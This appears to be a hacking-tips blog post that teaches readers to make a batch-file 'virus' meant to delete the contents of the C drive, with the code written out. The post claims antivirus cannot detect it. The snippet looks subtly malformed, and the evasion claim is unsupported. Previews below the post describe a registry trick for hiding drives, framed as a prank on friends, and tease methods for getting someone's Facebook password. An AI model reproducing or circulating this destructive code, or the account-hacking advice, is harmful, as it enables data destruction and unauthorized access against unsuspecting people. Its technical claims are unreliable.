Skip to main content

Learn To Make Dangerous Virus In A Minute

Learn To Make Dangerous Virus In A Minute 

In this post, i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.


What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

 

Popular posts from this blog

Hide Drives for security & Privacy

Hide Drives for security & Privacy   My dear friends....!!! I am YASH  , and I again back for improving your computer skill. Today i am going to telling one more interesting tip that is "HIDE DRIVES FOR SECURITY AND PRIVACY", This is a great trick you can play on your friends to disable the display of local or networked drives when you click My Computer. 1.Go to start->run.Type regedit. Now go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Now in the right pane Create a new DWORD item and name it NoDrives (it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) . Now restart your computer. So, now when you click on My Computer, no drives will be shown (all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created. Again restart your computer. You can now see all the drives again. If you have any oth...

How To check | Stop | Secure that Your Computer Hacked or Not

How To check | Stop | Secure that Your Computer Hacked or Not   The Computer hackers can the cause serious damage to most of computer and may be your personal information.  Hacking can mean the number of things but the computer hacking is a basically when someone accesses into your computer or may be its resources. Without your permission and then initially may be without your knowledge. Computers can be the hacked without leaving any evidence behind that. As the home user and you can always find out that if you have been hacked by the black hat hackers because the black hat hacker either wants keep using your personal computer resources or may be want to harm the computer. As the black hat can try to access your computer. So as I am security Researcher it’s my duty to stop the black hat hacker from the unethical work and also inform to the people about the all activity of those person. So here is simple trick that how you can check your computer that may hacked...
How To Get Someone’s Facebook Password When You Need It BY YASH A lot of people claim to be shocked when they find out that someone could possibly view details on their Facebook profile that they had believed were permanently and totally hidden. If you have been using the web for any length of time then you realize it’s quite easy to learn how to get someone’s Facebook password and see whatever you want. This is perhaps the greatest myth perpetuated by Facebook: that data you give them is somehow safe from prying eyes with a modicum of knowledge – it is not. You can actually hack Facebook easily enough once you know the primary methods people use. Some are more complex and other means for viewing private Facebook profiles are very simple. However, before you do any of this you really need to make sure that you are prepared for the fact that you may end up being recorded as you perform the hack. If you are going to take the time to read up on how to get someone’s Fac...